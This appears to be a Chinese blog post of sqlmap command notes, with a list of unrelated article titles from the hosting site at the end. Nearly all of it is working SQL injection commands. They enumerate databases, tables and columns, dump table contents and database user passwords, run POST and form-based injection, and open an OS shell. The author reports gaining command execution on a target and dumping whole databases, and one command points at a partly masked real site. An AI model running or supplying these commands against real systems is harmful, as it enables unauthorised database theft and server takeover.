sqlmap 命令笔记
基础命令 注入 MySQL
mssql access 直接爆表.然后你懂的
BT5里面的话前面就要加python
sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users 查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段
翻回来也可以
sqlmap.py -u url 判断
sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -D '表' 爆表
sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0
POST注入
第一种利用burp抓包然后使用sqlmap -r 来进行检测注入
先burp抓post的包 把抓到的信息放到sqlmap 目录下 名字 clay.txt代替
sqlmap.py -r post.txt //开始post注入
sqlmap.py -r post --dbs
第二种比较简单,直接使用sqlmap --forms 这个参数就可以了
sqlmap.py -u "url" --forms
sqlmap.py -u "url" --forms --os-shell
惊奇的发现,注入点可以进行命令执行
权限:nt authority\network service
这儿我们将所有的库导出来,我想这就是前段时间盛传的脱裤吧,在执行这项操作的时候,会把所有的表里的内容导入到当前的一个目录下,看着清楚明了,但是花费的时间和很长。
sqlmap -u "http://www.xxxxxe.com/xxxxsphp?class=news&id=5&page=1&catalog_id=2" --users --password 爆用户密码
最新文章
- 透过浏览器看HTTP缓存
- win8 app GridView点击子项布局变更
- 调试asp.net网页时不显示treeview的原因
- html5设计原理(转)
- ion-slide-box,无限循环
- 按钮打开链接,按钮click代码
- How ADB works
- javaScript中with的用法
- iOS 将系统文字设置为中文
- BZOJ 1316: 树上的询问( 点分治 + 平衡树 )
- Unity 3d游戏逆向及.NET Reflector工具使用介绍
- oracle 游标简单示例
- vue-render函数和插槽
- ubuntu快速部署gitlab汉化容器
- python的GIL
- Flutter环境搭建
- ionic3问题记录
- EOS智能合约开发(三):EOS创建和管理账号
- python全栈开发day54-mysql库操作、表操作、数据类型、完整性约束
- 单元测试系列之一:如何使用JUnit、JaCoCo和EclEmma提高单元测试覆盖率